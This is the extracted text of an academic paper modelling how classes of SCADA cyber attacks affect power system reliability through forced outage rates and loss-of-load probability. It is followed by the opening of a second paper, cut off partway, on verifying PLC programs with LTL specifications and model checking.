Investigating the Impact of Cyber Attacks on Power System Reliability *Yichi Zhang, *Lingfeng Wang, and Weiqing Sun *Department of Electrical Engi neering and Computer Science Department of Engineering Technology The University of Toledo Toledo, Ohio 43606, USA Email: [email protected] Keywords power system reliability; SCADA system; cyber security; forced outage rate; loss of load probability. I. I NTRODUCTION The drastic technological innovation has enabled the power system to be more flexible and to accommodate a more open architecture to fulfill the re quirements of modern power industry [1]. Also, as the communication technology plays a crucial role by improving the information management efficiency in the power system, more communication protocols and network structures are being investigated, which provides the power system a more open development environment. In these days, the supervisory control and data acquisition (SCADA) system is an import part of the power grid system by collecting data from the remote facilities and sending back the control commands. As the power grid becomes more complex and tightly coupled with the SCADA system, the resilience of the power system becomes susceptible as the power grid tu rns out to be more vulnerable to the external cyber attacks than the internal errors of operations [2]. Thus, it is crucia l to carry out the analysis of vulnerability incurred by the cyber attacks between the SCADA and power system and quantify the impacts due to the attacks. However, although the security problem of the SCADA and power system has been present for several years,due to the lack of quantification efforts [3] and limited work ofintegrated analysis of both the SCADA system and power system, the evaluation of the actual impact of cyber attacks on the power supply adequacy is lacked thus far. In order to conduct the evaluation, it is necessary to do a quantitative study of the severity of the cyber attacks foridentifying the cascading failures in the cyber domain [3]. Since the power system is directly controlled by the SCADAsystem, it is useful to analyze the effects of the cyber attacks on the SCADA system so that the impacts of cyber attacks on the power system can be derived. Thus, typical attacks launched to the SCADA system should be found out and their types need to be classified. Also, attacks targeting the control and communication functions of the SCADA system will yielddifferent levels of risks to the power system. For instance, the infection of worms in the control subsystem of the SCADA system may shut down the whole SCADA, while some attacks may slightly increase the vulnerabilities of the SCADA system. The influences of these attacks on the SCADA will incur different impacts on the power system. What's more, it is crucial to assess the realistic effects of various attacks on the components in the power grid system based on their corresponding attack models. The generators, transmission lines, and loads in the power grid have different probabilities of failure, and these probabilities may be significantly different due to the reliability ch aracteristics of their elements. Therefore, by studying the reliability characteristics of various components and the probabilistic models of different attacks to the SCADA system, the impacts on the reliability of the components in the power grid system can be evaluated, and the corresponding protection schemes can also be decided. In this paper, by considering typical cyber attacks and their effects on the SCADA system, as well as the impacts of these attacks occur in different components of the power system, a forced outage rate (FOR) model is proposed, and the reliability analysis is performed to derive the loss of load probability (LOLP) curves using the FOR model in the Monte Carlo simulation (MCS). The organization of this paper is listed as follows: In Section II, the related work of cyber attacks on the SCADA system and the reliability analysis are discussed. Typical attacks in the SCADA system and the proposed FOR model are described and analyzed in Section III. And in Section IV, the LOLP curves in two reliability test systems are simulated   ,((( 462Proceedings of the 2013 IEEE International Conference on Cyber Technology in Automation, Control and Intelligent Systems May 26-29, 2013, Nanjing, China Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:51 UTC from IEEE Xplore. Restrictions apply. and analyzed based on the MCS with the FOR values. And the paper is concluded in Section V. II. L ITERATURE REVIEW Since the power system is not only a network composed of generators and loads through th e transmission lines, but is overlaid with the communication and control system such as SCADA, which manages the economic and secure operation [4], the estimation of the reli ability of the power system and SCADA is significantly complicated and necessary. A number of studies on the power system and SCADA have shown their efforts on searching for the impacts of power system. Vulnerability assessment of th e cyber security of the SCADA system controlling the power grid is illustrated in [5]. Two models of the SCADA systems, firewall model and password model, are generated for the simulation of attacks.The firewall model is used to regulate the packets between networks, while the password model is applied to monitor the penetration attempts. With thes e two models, vulnerabilities of the SCADA system are evaluated in two scenarios with attacks from inside and outside the network, and the vulnerability indices for each model is calculated. Similar investigation of the vulnerability evaluation was conducted in [6] by using attack tree approach. A reachability framework is developed in [2] to perform safety analysis for a two-area power system. The attack targeting the power system by gaining the access to the Au tomatic Generation Control (AGC) can be identified using the reachability framework. However, this approach focuses on the two-area in the power system, rather than the SCADA system. The vulnerabilities of the industrial control networks are reviewed and discussed in [7]. The threats to devices in the power system such as Programmable Logic Controllers (PLC), Distributed Control Systems (DCS), and Human Machine Interfaces (HMI) in SCADA system are analyzed, and a series of protection policy is developed and applied to increase both internal and external security of the network. And in [8] it gives a detailed review of the vulnerabilities and risks of various components of the electric power system. Since security flaws of SCADA are considered as the main vulnerable point from the remote access through Internet, new communication standard is needed for the encryption devices between the SCADA RTU and the modem linked to the Internet. More literature focuses on the impacts of attacks or vulnerabilities on the SCADA system, which is highly related to the security of the entire power system. In [9] it proposed model of the control system in SCADA to identify the most critical sensors and attacks of anomaly detection. Three mathematical models of stealthy attack are simulated as the intrusion to the control system, and it was found that protecting against the integrity attacks is more important than DoS attacks. It means the integrity attacks will lead to more severe impact on the SCADA system. Similarly, [10] presented a risk assessment method by using a Operationally Critical Threat, Asset, an d Vulnerability Evaluation (OCTAVE) tool to evaluate the risk model, which identifies the severity levels of the th reats and vulnerabilities in the control system. In [11], The Modbus DoS attack which is composed of email-based attack, phishing attack, and Modbus worm attack in SCADA are analyzed for the SCADA systems in the process network. The Modbus worm attack is tested in the power plant testbed, which concluded that the effective attacks should be launched by knowing the high-level architecture of the system. Also, it is found in [12] that about 78% incidents of external attacks between 2002 and 2006 are worms, viruses, and Trojan horses, and over 50% are worms. For instance, the Slammer worm has an extremely high infection rate by doubling themselves each 8.5 seconds [13]. What's more, popular approaches that prevent risks and vulnerabilities such as firewall and intrusion detection systems are evaluated in the SCADA network environment [14], [15]. III. A TTACKS IN SCADA S YSTEM There are multiple approaches to classifying the attacks in SCADA systems. In [13], three categories are classified based on the intention of launching the attacks, including intentional targeted attacks, unintentional consequences caused by worms and viruses, and unintentional consequences raised by internal causes. In our study the attacks are classified by the effects brought to the SCADA system. The effects on the SCADA system include confidentiality, integrity, and availability. Additionally, worms and viruses account for a great amount of incidents of the SCADA attacks and usually lead to the consequence of shutting down the whole system. Here worms and viruses are separated from other attacks and their occurrences and effects will be described in this section. When the attacks occur in the SCADA system, the control or the communications of the SCADA will be influenced by the effects of one or several of these attacks. With the failed controls from the SCADA, the management or the transmission of the power may be affected in the power system. For example, the transmission line may be improperly tripped due to the modified relay setting by the malicious intruders. This can be indicated as the increase of the forced outage rate (FOR) values of the components in the power system. FOR is a basic generating unit parameter for the static capacity evaluation [16] and is used for forecasting the probability of the component in the forced outage mode, which indicates the unavailability status. The FOR of components in the power system is shown as (1): i old new P FOR FOR i+D (1) In (1) old FOR is the original FOR values of two components: generators and the transmission lines in various power systems. Pis the probability of one type of attacks occurring in the SCADA system, and iis the type of each attack. Dindicates different impacts of the attacks with different probabilities of occurrences. From the record of external attack incidents between 2002 and 2006, DoS attacks take the least part of 4% in the total record, and the attacks capable of ruining the confiden tiality and integrity take about 9% of the total attacks. The largest amount of attacks is generated by the worms, viruses, and Trojan horses, which takes 78% of the total incidents, and three types of worms account for over 50% of the total records [12]. The worms and viruses occupy a great portion of the recorded attacks, and the aspects impacted by worms and viruses might be the 463 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:51 UTC from IEEE Xplore. Restrictions apply. combination of the confidentiality, integrity, and availability. Therefore, they are separated from the DoS attacks as well as the confidentiality and integrit y attacks. The rates of attack distributions are generally denoted as iPin this paper, but the values of iPare variable since the targets of attacks may be changed and the distributions of the new attacks may differ from the ones of several years ago. These rates of attacks are considered as values ofiP, while some modifications of the rates for different attacks are made by considering the changes of vulnerabilities and targets in the SCADA system. Dis represented by (2), which is influenced by three factors: lk HD (2) In (2),H indicates the risk level at which different components might be affected by the upcoming attacks. Two components, generator and transmission line of the power systems, are considered at different risk levels. Since the generator is more centralized and easier to control and manage, the probability of increasing vulnerabilities and risks from the attacks is low. On the other hand, the transmission lines are constructed in the distributed mode, which are more vulnerable to attacks. Thus tw o risk levels which show low and high levels are given to th e generator and the transmission lines, and the values are normalized as 0.2 and 0.7. kis a coefficient indicating whether the attack is easy to be generated and launched. Some attacks such as worms are easy to generate and spread within a very short time, thus their values of the corresponding kare labeled as high. Rather, some attacks such as spoofing are generated by approaches with complex steps and expensive equipment and their values of kare set lower. And limplies the severity level of impact that the attack may bring to SCADA system. The attacks leading to immediate paralysis of the system will be assigned higher lvalues, while the attacks that bring slight vulnerability to the SCADA have lower l values. In order to analyze the impact of cyber vulnerability on the power system through the attacks on the SCADA, 10 typical attacks, which can leave vulnerabilities and risks in DoS (availability), confidentiality, and integrity of the SCADA system, are analyzed based on the classification and the influencing elements discussed above. Also, since worms and viruses take a largest part in all attacks, they are separated from other attacks and considered as two other types of attacks. The typical DoS attacks in SCADA system could be found as e-mail based attack, phishing attack, and spoofing. As it is named, the e-mail based attack is launched through appropriate access by forging an e-mail with correct headers and contextual information. With an attachment of DoS malware, the malicious information will be delivered to the target slaves once the malware is installed into the network, which will lead to the loss of synchronization between master and slave machines. Thus it can be found that the e-mail based attack owns high values of both kandl. However, as the pure DoS attacks are rarely implemented in the environment of SCADA system, and the e-mail based attack could be prevented before it is delivered through the SCADA system, the occurrence of this attack is considered as very rare, which means the value of its Pis very low. The phishing attack transmits the website that can lead to DoS malware downloading in the malicious scripts. Several steps are needed in order to launch this attack. First, some tricks such as a DNS poisoning attack that makes the operator visit the website with the malicious scripts are applied, then the DoS malware will be downl oaded and execu ted when the scripts are reviewed, and finally the communications or control in the SCADA system will be blocked by the DoS attack. The process of launching the phishing attack is not as simple as the e-mail attack due to the combination of other attacks, thus the value of its kis labeled as the middle level. However, based on the effect of this attack on the system, which shows the communications between the components can be cut off, the severity level of this attack is still high. Fortunately, the occurrence of this type of attack is also rare, thus the Pvalue of phishing attack is very low. The last popular DoS attack to the SCADA system is spoofing, which is also known as replay attack [13]. By transmitting commands to the controller continuously and cutting off communications between devices, it may lead to an undesirable result in both SCADA system and control devices in the power system. At the same time, some crucial data from the controller or HMI may be modified. These will lead to a high value of lof spoofing attack. However, this attack has the most difficult payload to operate, which makes spoofing one of the complex attacks to execute. Thus the value of kof spoofing should be deemed as a low level. Similar to other DoS attacks, this attack is also rare in the total occurrence of attacks, which means the value of Pis set the same as phishing attack. The worm attack is a very effective and efficient technique to spread malicious attacks in the SCADA system [11]. Based on the record of attacks of SCADA during 2002 to 2006, over half of attacks launched to the SCADA are worms, which are Slammer, Blaster, and Sasser worms. Worms are spread to the devices leading to the severe results such as backdoor of the control components or other vulnerability issues. Once a machine is infected by the worm, it will attempt to spread the worms to new hosts and efficiently execute the malicious code. And from the result of infections on the system, it can be found all the slave machines are controlled by the worms [11]. Also, the attacks of the Slammer worms disabled the safety monitoring system for about five hours, and it affected the Windows server and communications networks by blocking the control system traffic in 2003 [13]. With these references, it can be found that all the levels of k, l, and Pof the worms should be set higher than other attacks. The viruses and Trojan horses result in similar effects as the worms by transmitting themselves with e-mails and opening the backdoor. For instance, the Sobig virus spreads itself through e-mails when the victims check the e-mails and then sends itself to other computers with the aid of addresses from the victims' address book. By shutting down the train signaling systems, the viruses may also result in a severe 464 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:51 UTC from IEEE Xplore. Restrictions apply. paralysis of the whole system. Therefore, both values of k and lof the virus and Trojan should be labeled high, but not higher than the worms. At the same time, the probability of occurrence of virus and Trojan is also high, which occupies the second largest portion of the total amount of SCADA attacks. Attacks that ruin the confidentiality of the SCADA system are the laying bait attack and remote access attack. Compared with other attacks, the laying bait attack is easier to launch. By leaving USB drives containing ma licious software in the target device and sending the forged e-mail to the operator of that device, a backdoor could be installed in the device with ease. Therefore, the value of kcould be set very high. However, in most scenarios, confidentiality a ttacks only increase the risks of the SCADA system, such as data stealing or adding unauthorized access, rather than controlling the operation directly. Thus the level of severity of laying bait attack is quitelow. Remote access attack is a common attack since multiple SCADA devices are installed with dial-up modems for the remote access to provide convenient operations on the devices remotely. This provides the adversaries with a backdoor intruding into the control system, and the adversaries can entry the system with several approaches such as password cracking software and modem searching programs. In [12] it illustrated nine remote entry points for the remote accessing, such as Dial-up modem, Internet, and wireless system. With these potential backdoors, it is convenient to launch a remote access attack, which leads to a high value of kfor this attack. And some remote connections may leave the system highly vulnerable since the adversaries and normal users may share the same approaches for entering the system, they are granted high levels. Thus the level of severity l should be higher than that of the laying bait attack. However, since this attack still belongs to the confidentiality attack, the severity of the remote access attack is only set as the middle level. The last confidentiality attack is the vulnerability exploitation. Since no system is perfectly designed, vulnerabilities exist in all networks and systems of SCADA. Thus it is not rare that some adversaries may intrude into the control system by taking advantage of these vulnerabilities. For instance, by applying a port scan and accessing a web server, the device that controls the web server may fail to function properly. However, the effects of this attack on the devices could be diverse due to different failure modes. The device might be immediately shut down or seriously destroyed, while it may also result in a sluggish performance. Thus its value of lis given a large range. And based on the rate of the accumulated confidentiality attacks, the number of occurrences of these three attacks is larger than the pure DoS attacks, while still less than the number of worms and viruses. The last two attacks target the integrity of the SCADA system, which are man-in-the-middle attack and change of instructions. The integrity att acks could be raised by the confidentiality attacks, which may use the unauthorized data or identifications, so that the information of the objects is modified or deleted. By launching man-in-the-middle attack, some commands are altered or deleted so that the operator may be required to perform a task which is not needed, or be told everything is well operated when some operations are needed. This attack may result in various risks based on the alterations of the commands or control data. Also, since theeffect of integrity attacks is mo r e s e v e r e t h a n t h a t o f t h e confidentiality attack, the value of lis also alternated between middle and high levels. Furthermore, since it is a popular attack, the value of kcould be set as the middle level. And based on the data of attack occurrence, the occurrence rate of the integrity attacks is identical to the value of confidentiality attacks. The last type of attack is the changes of instructions. It is not limited on the instructions or commands in the SCADA system. The modifications of the configuration settings or other cyber components can also be considered as this type of attacks. In order to launch this kind of attacks, the adversaries should prepare for a very complex payload in order to reach the system. This lead to a very low value of k, which is similar to the kvalue of the spoofing attack. However, the complicated process of attack launching also increases the severity of attack to the SCADA system. The attacks of the SCADA system and their corresponding parameters are illustrated in Table I. The values of the parameters are decided based on the analysis of the SCADA attacks discussed previously. Considering the distribution of the attacks in the SCADA system in recent years, and similar results such as DoS caused by the worms and viruses, the Pvalues of worms and viruses are limited to 30% and 20%. And for values of l, due to the diverse components attacked and different severities of the modified data, the effects from attacks of vulnerability exploitation and man-in-the-middle could be dramatically different on the SCADA system. Thus ranges are given to lvalues of these two types of attacks showing their variable influences on the system. TABLE I. T HE PARAMETERS OF ATTACKS IN THE SCADA SYSTEM AttacksParameters k l P e-mail based attack0.8 0.8 2% phishing attack 0.5 0.8 3% spoofing 0.2 0.8 3% worm 1 1 30% virus and Trojan 0.8 0.8 20% laying bait 1 0.2 7% remote access 0.8 0.2 7% vulnerability exploitation0.5 0.2~0.8 10% man-in-the- middle0.5 0.5~0.8 9% change of instructions0.2 0.5 9% 465 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:51 UTC from IEEE Xplore. Restrictions apply. IV. S IMULATION RESULTS AND ANALYSIS A. FOR Curve for RTS79 The distributions of the attacks are illustrated in Fig. 1, which are based on the probabilities of attacks to the SCADA in Table I. It can be found that the worm and virus attacks take the majority portion while DoS attacks occupy the smallest portion, and the confidentiality and integrity attacks take similar parts between 7% and 10%. Fig. 1. Probabilities of the attacks in SCADA. Based on different occurrences and severities of 10 types of attacks discussed in section III, the FOR values of different components in the power system are influenced by these attacks and should be adjusted accordingly. Since same increments are added to original FOR values of generator and transmission line, only one gene rator and one transmission line are selected from the RTS79, and the increased FOR values in the total 10 scenarios are illustrated by the curves in Fig. 2 and Fig. 3 respectively. 1 2 3 4 5 6 7 8 9 1000.050.10.150.20.25 Scenarios of attacksFOR curve of the generator in RTS79 Fig. 2. FOR curve of a generator. It can be found in Fig. 2 and Fig. 3 that the FOR curves of both generator and transmissi on line alter similarly as the distributions of 10 types of SCADA attacks. As the values of Hare set different on generator and transmission lines, these two curves show different slopes. As the risk level of generator is set lower, which implies the generator is less sensitive to the influence of th e attacks, the increase of theFOR values is slight, as indicated by gentle slope of the generator FOR curve. On the other hand, the influence on the transmission line is larger as less protection is provided to the transmission lines, thus the range of FOR values of the transmission line is la rger than that of the generator. Also it can be found that in both FOR curves, the influence of the worms is the highest compared with the other attacks, which shows that the new values of FOR increase to 0.16 and 0.21. 1 2 3 4 5 6 7 8 9 1000.050.10.150.20.25 Scenarios of attacksFOR curves of the transimission line in RTS79 Fig. 3. FOR curve of a transmission line. B. LOLP Curve for RTS79 and MRTS The LOLP curves for the IEEE RTS79 and MRTS are derived and illustrated in Fig. 4 in red and blue lines respectively. Both curves exhibit similar variation characteristics. But it can be found that the range of the MRTS LOLP values is slightly larg er than that of RTS79 LOLP values, as the range of RTS79 LOLP curve is between 0.12 and 0.86, while the range of MRTS LOLP curve is between about 0.1 and 0.93. Since the values of LOLP are mainly controlled by the FOR values, the curves of LOLP values in both RTS79 and MRTS follow the similar pattern as the FOR curves. It can be found that the largest LOLP values are induced by the impact of worms, which may leave the whole system paralysis since both LOLP values are valued at about 0.9. Similarly, the impacts of viruses and Trojans could also bring dramatic damages to the system since both LOLP values exceed 0.5 while the MRTS system is more sensitive to these attacks. Also in both curves the first 3 values take the lowest part of curves, which means the impact of the Do S attacks is the least. Also it should be noticed that although the Pvalue of those two confidentiality attacks ar e slightly less than Pof the integrity attacks, the impacts on the power system are similar to the DoS attacks. It is illustrated th at confidentiality attacks have slight impacts on the power system even though they own a great amount of records. What's more, the impacts of the confidentiality and integrity attacks are found to be similar. Although the Pvalue is set higher than other confidentiality and integrity attacks, the 8th LOLP value is found smaller than those of other integrity attacks. This may be caused by the randomly picked value of vulnerability exploitation attack which has the least influence on the system. 466 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:51 UTC from IEEE Xplore. Restrictions apply. From the variations shown in the curve of Fig. 4, it can be found that the impact of cyber attacks on the overall power system agrees with the severity of attacks in the SCADA system. When more severe attacks are launched to the SCADA system, more severe consequence will be caused to the power system in terms of power supply reliability. 1 2 3 4 5 6 7 8 9 1000.10.20.30.40.50.60.70.80.91 Scenarios of attacksCurves of LOLPRTS79 LOLP MRTS LOLP Fig. 4. LOLP curves for IEEE RTS79 and MRTS. V. C ONCLUSION AND FUTURE WORK In this paper, ten types of cyber attacks and their effects on the SCADA system are analyzed . A probability based forced outage rate (FOR) model of the generator and transmission line considering the cyber vulnerability aspects is proposed. This FOR model is derived by considering the distribution of attacks in SCADA and their impacts on the power system. The LOLP curves are derived using MCS for two typical power systems (IEEE RTS79 and MRTS) in 10 types of attackscenarios. And the simulation results showed that the power system becomes less reliable as both occurrence and severity of the attacks towards the SCADA system are increased. In the future research, more probable attacks and their effects on generators or transmission lines in different parts of the power system will be explored by building appropriate mathematical models. Also, though there are high similarities between SCADA systems used in general industrial sectors and in power system automa tion, a more realistic model specific to power system applications should be derived for amore in-depth study on integrated cyber security and system reliability.A CKNOWLEDGMENT This work was in part supported by the National Science Foundation (NSF) under the Award Number ECCS1128594. REFERENCES [1] C.-W. Ten, C.-C. Liu, and G. Manimaran, "Cyber-Vulnerability of Power Grid Monitoring and Control Systems," Proceedings of the 4th Annual Workshop on Cyber Security and information intelligence research (CSIIRW), May, 2008, Oak Ridge, TN. [2] P. M. Esfahani, M. Vrakopoulous, K. Margellos, J. Lygeros, and G. Andersson, Cyber attach in a two-area power system: Impact LGHQWL FDWLRQ XVLQJ UHDFKDELOLW\  LQ 3URF $PHULFDQ &RQWURO &R QI Baltimore, USA, June 2010, pp. 962 967. [3] D. Kundur, X. Feng, S. Liu, T. Zourntos, and K. Butler-Purry, Towards a framework for cyber attack impact analysis of the electric smart grid, in Proc. of IEEE SmartGridComm, Gaithersburg, MD, Oct. 2010. [4] K. Tomsovic, D. Bakken, V. Venkatasubramanian, and A. Bose, Designing the Next Generation of Real-Time Control, Communication,and Computations for Large Power Systems, Proc. IEEE, vol. 93,no. 5, May 2005. [5] C.-W. Ten, C.-C. Liu, and G. Manimaran, Vulnerability assessment of cybersecurity for SCADA systems, IEEE Trans. Power Systems, Vol. 23, No. 4, pp. 1836-1846, 2008. [6] C.-W. Ten, C.-C. Liu and M. Govindarasu, Vulnerability assessment of cybersecurity for scada systems using attack trees, IEEE PES General Meeting, USA, 2007, pp. 1-8. [7] A. Creery and E. J. Byres, Industrial cybersecurity for power system and SCADA networks, in Proc. Ind. Appl. Soc. 52nd Petroleum Chem. Ind.Conf., Sep. 12 14, 2005, pp. 303 309. [8] D. Watts, Security and vulnerability in electric power systems, in Proc. 35th North American Power Symposium, Rolla, Missouri, October 2003, pp. 559 566. [9] A. A. Cardenas, S. Amin, Z.-Y. Lin, Y.-L. Huang, and S. Sastry, "Attacks against process control systems: risk assessment, detection, and response," in Proc. of 6th ACM Symp. on InformAtion, Computer & Communications Security, Mar. 2011, pp. 355 366. [10] G. A. Francia III, D. Thornton, J. Dawson, "Security Best Practices and Risk Assessment of SCADA and Industrial Control Systems," http://elrond.informatik.tufreiberg.de/papers/WorldComp2012/SAM978 9.pdf [11] I. N. Fovino, A. Carcano, M. Masera, and A. Trombetta, An experimental investigation of malware attacks on SCADA systems, Int. J. Critical Infrastructure Protection, vol. 2, no. 4, pp. 139 145, Dec. 2009. [12] E. Byres, D. Leversage, and N. Kube, "Security incidents and trends in SCADA and process industries," The Industrial Ethernet Book 39(2), 12 20.2007. [13] R. Tsang, "Cyberthreats, vulnerabilities and attacks on SCADA networks," University of California, Berkeley, Working Paper, http://gspp. berkeley. edu/iths/Tsang_SCADA% 20Attacks. pdf, 2010. [14] V. M. Igure, S. A. Laughter, R. D. Williams, "Security issues in SCADA networks," Computers & Security 2006;25(7):1 9. [15] P. Ralston, J. Graham, and J. Hieb, "Cyber security risk assessment for SCADA and DCS networks," ISA Transactions, vol. 46, no. 4, pp. 583 594, 2007. [16] R. Billinton and R. N. Allan, "Reliability Evaluation of Power Systems," New York: Plenum, 1996. 467 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:51 UTC from IEEE Xplore. Restrictions apply.
Construction_and_verification_of_PLC_programs_by_LTL_specification.pdf
The article proposes an approach to construction and verification of PLC ST-programs for discrete problems. The linear-time temporal logic LTL is used for the specification of the program behavior. Programming is carried out in the ST (Structured Text) language, according to the LTL-specification. The correctness analysis of the LTL-specification is performed by Cadence SMV, a symbolic model checking tool. A new approach to programming and verification of PLC ST-programs is illustrated. For each discrete problem, we propose creating an ST-program, its LTL-specification, and an SMV-model.
Construction and Verification of PLC Programs by LTL Specification E.V. Kuzmin Yaroslavl State University Yaroslavl, Russia Email: [email protected] A.A. Shipov Yaroslavl State University Yaroslavl, Russia D.A. Ryabukhin Yaroslavl State University Yaroslavl, Russia Email: [email protected] Email: [email protected] I. INTRODUCTION Using programmable logic controllers (PLC) in systems managing complex industrial processes imposes strict correctness requirements upon the PLC programs. Any software error in a PLC program is considered inadmissible. However, the existing PLC program development tools, for instance, the widely known CoDeSys (Controller Development System) package [7], merely provide the ordinary possibilities of program debugging through testing (not guaranteeing total absence of errors) by means of visualizing the PLC controllable objects. At the same time, certain theoretical knowledge along with experience of using existing designs, has been accumulated in formal modeling methods and software system analysis field. The programming of logic controllers is an applied field, in which existing designs can be applied successfully. Successful application is understood as the introduction of formal methods into program development process as a proven technology, which is clear to all specialists involved in this process: engineers, programmers and testers. PLC-programs are normally small, have a finite-state space, and are exceptionally convenient objects for the formal (including automatic) correctness analysis. Programmable Logic Controllers (PLCs) are a specific type of computer used widely in modern industry (in automation systems) [9], [4]. A PLC is a reprogrammable computer based on sensors and actors, which is controlled by by a user program. They are highly configurable and thus are applied to various industrial sectors. PLCs are a classic example of reactive systems. A PLC periodically repeats the execution of the user program. There are three major phases of program execution (working cycle): 1) reading from inputs (sensors); 2) program execution; 3) writing to outputs (actors). Programming languages for logic controllers are defined by the IEC 61131-3 standard. This standard includes the description of five programming languages: SFC, IL, ST, LD and FBD. These languages provide a possibility of applying all existing methods of program correctness analysis testing, theorem proving [8] and model checking [6] for verification of PLC programs. Theorem proving is more applicable to continuous stability and regulation tasks of the engineering control theory, since the implementation of these tasks on a PLC is associated with programming a relevant system of formulas. The model checking method is most suitable for discrete tasks of logic control requiring a PLC with binary inputs and outputs. This provides a finite space of possible states of the PLC program. The most convenient languages for programming, specification and verification of PLC programs are ST, LD and SFC as they do not present difficulties for either developers or engineers and can be easily translated into the languages of software tools for automatic verification. Earlier in [2] a review of methods and approaches to programming discrete PLC problems was provided based on the example of a problem of modeling a code lock control program. The usability of the model checking method for program correctness analysis with respect to the Cadence SMV automatic verification tool [12] was evaluated. Some possible PLC program vulnerabilities that surface when traditional approaches to programming, are used were revealed. This article proposes an approach to modeling and verification of discrete PLC programs. To specify program behavior, we use the linear-time temporal logic, LTL. The programming is carried out in the ST language according to the LTL specification. The LTL specification correctness analysis is carried out by the Cadence SMV symbolic model checking tool. We demonstrate a new approach to programming and verification of PLC programs. A discrete problem is provided with an ST program, its LTL specification, and an SMV model. The purpose of the article is to describe an approach to programming PLCs, which would provide a possibility of PLC 2013 Tools & Methods of Program Analysis 978-0-9860-7731-9/14 $31.00 2014 DOI 10.1109/TMPA.2013.1015 2013 Tools & Methods of Program Analysis 978-0-9860-7731-9/14 2014 Exactpro Systems, LLC All rights reserved DOI 10.1109/TMPA.2013.1015 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:45 UTC from IEEE Xplore. Restrictions apply. program correctness analysis by applying the model checking method. Further work includes building software tools for modeling, specification, construction and verification of PLC programs. II. MODEL CHECKING . A PLC PROGRAM MODEL Model checking is the process of verifying whether a given model (a Kripke structure) satisfies a given logical formula. A Kripke structure represents the behavior of a program. A temporal logic formula encodes the property of the program. The linear-time temporal logic (LTL) is used. A Kripke Structure on a set of atomic propositions P is a state transition system S=S=(S, s 0, , L), with a non-empty set of states S, an initial state s0 S, a transition relation S S , which is defined for all s S, and a function L:S 2 P, labeling every state by a subset of atomic propositions. The Path of the Kripke structure from the state s 0 is an infinite sequence of states =s 0s1s2 where i 0 s i s i+1. The linear-time temporal logic language is considered as a specification language for behavioral properties of a programming model. PLC is a classic reactive control system, which, once running, must always have the correct infinite behavior. LTL formulas allow representing this behavior. The syntax of the LTL formula is given by the following grammar, pi P: , ::= true | p 0 | p 1 | | p n| | | X | U | F | G The LTL formula describes the property of one path of the Kripke structure, starting from some emphasized current state. The temporal operators X, F, G and U are interpreted as follows: X means that must hold in the next state, F means that must hold in some future state of the path, G means that must hold in the current state and all future states of the path, U means that must hold in the current or a future state, and must hold until this point. In addition, classic logical operators and will be used further on. A Kripke structure satisfies an LTL formula (property) , if holds true for all paths, starting from the initial state s . A Kripke model for a PLC program can be built quite naturally. For a state of the model we are taking a vector of values of all program variables, which can be divided into two parts. The rst part is a value vector of inputs at the starting moment of a new PLC working cycle. The second part is a value vector of outputs and internal variables after a complete working cycle (on the inputs from the rst part). In other words, the state of the model is the state of the PLC- program after a complete working cycle. Thus, a transition from one state to another depends on the (previous) values of the outputs and internal variables of the rst state and the (new) values of inputs of the second state. For each state, the degree of the transition relation branching is determined by the number of all possible combinations of PLCs input signals. Atomic propositions of the model are logical expressions on the PLC program variables with the use of arithmetic and relational operators. III. PROGRAMMING CONCEPT The purpose of the article is to describe an approach to programming PLCs, which would provide a possibility of PLC program correctness analysis by means of the model checking method. We will proceed from convenience and simplicity of using the model checking method. It is necessary that the two following conditions hold true. Condition 1. The value of each variable must not change more than once per one full run of the program during the PLC working cycle. Condition 2 . The value of each variable must only change in one place of the program in some operation block without nestings. It is obvious that one run of the working cycle either increases, decreases or does not change the value of any variable. We will change the variable value only when it is really necessary, i.e. we will forbid the assignment of value access to the variable, if conditions of mandatory change of its value are not fulfilled. In this approach, the requirements for changing the value of a certain V variable after one run of the PLC working cycle are represented by the following LTL temporal logic formulas. The following LTL formula is used for describing the situations leading to an increase of the V variable value: GX (V>_V OldValCond FiringCond V =NewValExpr) (1) This formula means that whenever a new value of the V variable is larger than its previous value, recorded in the _V variable, it follows that the old value of the V variable satis es the OldValCond condition, the condition of the external FiringCond action is fulfilled, and the new value of the V variable is the value of the NewValExpr expression. The leading underscore symbol _ in V variable is taken as a pseudo-operator. It allows referring to the previous state value of the V variable. The pseudo-operator can be used only under the scope of the X temporal operator. The FiringCond and OldValCond conditions are logical expressions over program variables and constants, which are constructed using comparison operators, logical and arithmetic operators and the _ pseudo-operator. By definition the pseudo-operator can be applied only to variables. The FiringCond expression describes the situations where changing the value of the V variable is needed (if it is allowed by the OldValCond condition). The NewValExpr expression is built using variables and constants, comparison, logical and arithmetic operators and the _ pseudo-operator. For descriptions of all possible situations increasing value, this formula may have several sets of considered conjunctive parts OldValCond i FiringCond i V=NewValExpr i , combined in a disjunction, after the operator. Situations that lead to a decrease of the V variable value are described similarly: GX(V>V OldValCond FiringCond V=NewValExpr ) (1 ) Temporal formulas of the (1) and (1 ) type describe the desired behavior of some integer variable. A more simple LTL 16 16 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:45 UTC from IEEE Xplore. Restrictions apply. formula is proposed in case of a logical (binary) data type variable. The following formula describes the situations where the value of a binary V variable increases: GX( _V V=>FiringCond) (2) Situations that lead to a decrease of the V variable value are described similarly: GX(_V V=>FiringCond`) (2 ) Let us look at the special case of specifying the (1) and (1 ) type where for V we have FiringCond = FiringCond = 1, NewValExpr = NewValExpr , OldValCond = (V < NewValExpr) and OldValCond = (_V > NewValExpr): GX(V>_V _V<NewValExpr V=NewValExpr); GX(V<_V _V>NewValExpr V=NewValExpr). Such a specification can be replaced by the following LTL formula: GX(V=NewValExpr) (3) The V variable, for which the specifications of the (1) and (1 ) type and the (2) and (2 ) type are built, will be called a register variable. If a speci cation of the (3) type is built, V is called a function variable . In the special case of speci cation (3), where the NewValExpr expression does not contain the _ leading underscore pseudo-operator, the V variable is called a substitution variable. It is important to note that each of the LTL formula templates is constructive, i.e. by following the specification one can easily build a program that would conform to the temporal properties expressed by these formulas. Thus, we can say that PLC programming comes down to building a behavior specification of each program variable whether it is an output or an auxiliary internal variable. The process (stage) of writing program code is completed when a speci cation for each such variable is created. Note that the quantity and meaning of output variables are de ned by the 